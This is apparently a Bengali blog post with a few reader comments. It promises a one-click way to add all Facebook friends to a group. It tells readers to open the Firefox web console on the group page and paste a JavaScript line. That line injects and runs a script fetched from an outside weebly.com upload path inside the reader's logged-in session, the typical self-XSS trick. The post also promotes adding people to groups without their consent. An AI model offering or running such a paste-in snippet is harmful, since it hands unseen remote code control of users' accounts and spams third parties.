বিসমিল্লাহির রাহমানির রাহিম…………………………।।
আসসালামু আলাইকুম। সবাই কেমন আছেন ? আসা করি সবাই ভাল আছেন। আমি জানি আপনারা সব সময় ভালই থাকেন। আমিও আপনাদের দোয়াতে ভাল আছি। এটা আমার জীবনের প্রথম পোষ্ট। তাই আশা করবো কোন ভুল করলে সেটা ক্ষমা সুন্দর চোখে দেখবেন।
চলুন শুরু করা যাক। বর্তমানে কারো Facebook account নেই এমন মানুষের সংখ্যা কমই । অনেকে আবার এক বা একাধিক গ্রুপের মালিকও !! তাদের আবার হয়তো কারো কারো ফ্রেন্ডলিষ্টে হাজার হাজার ফ্রেন্ড। ফেসবুকের নিয়ম অনুযায়ী সব ফ্রেন্ডকে গ্রুপে এক বারে যোগ করা যায় না। সে ক্ষেত্রে একজন একজন করে যোগ করতে হয়। কিন্তু এখন থেকে আর না !! :D এখন থেকে এক ক্লিকেই যোগ করে ফেলুন ফ্রেন্ডলিষ্ট এর সব বন্ধুকে !!! :D:D:D
চলুন দেখি কি কি করতে হবেঃ (বিঃদ্রঃ এটা শুধু মাত্র ফায়ারফক্স, কমিটবার্ড ব্রাউজার ব্যবহারকারীদের জন্য।)
আপনার সব বন্ধুকে যে কোন ফেসবুক গ্রুপে এ্যাড করতে নিম্নোক্ত পদক্ষেপ গ্রহণ করুনঃ-
{১} আপনি যে গ্রুপে আপনার সব বন্ধুদের একত্রে যোগ করতে চান প্রথমে মজিলা ফায়ারফক্স/কমিটবার্ড ব্যবহার করে সেই গ্রুপে যান !
{২} এবার কীবোর্ডে Ctrl + Shift + K একসাথে চাপুন । দেখবেন একটা ড্রপ ডাউন মেনু এসেছে, এখানে জাভা স্ক্রিপ্ট লিখে আপনি অনেক কিছুই করতে পারেন। তবে আজ আপনাদের কে কিভাবে আপনার সব ফ্রেন্ডদের একটি গ্রুপে যোগ করবেন তা দেখাবো ।
{৩} এইবার নিচের জাভা স্ক্রিপ্টটি পুরোটা Copy করুন। অথবা পুরো জাভা স্ক্রিপ্টটা সিলেক্ট করে একসাথে Ctrl + C চাপুন >>—->>> (জাভা স্ক্রিপ্টটা নিচে দেয়া হল।)
javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://www.weebly.com/uploads/1/5/4/8/15485034/bappi.js’;})();
আজ এ পর্যন্তই, আপনাদের ভাল লাগলে একটু কষ্ট করে হলেও মন্তব্য করে জানাবেন………………… ধন্যবাদ !
টিপির পোষ্ট টিপিতেই কপি ! :v
হতে পারে। আমি নিজেই এর আগে এখানে এটা নিয়ে টিউন করেছিলাম। কিন্তু এখন আর খুজে পাচ্ছি না !!
তাই বাধ্য হয়ে আবার দিয়েছি। মন্তব্যের জন্য ধন্যবাদ।
পূর্বে আরো অনেক জাযগায় প্রকাশিত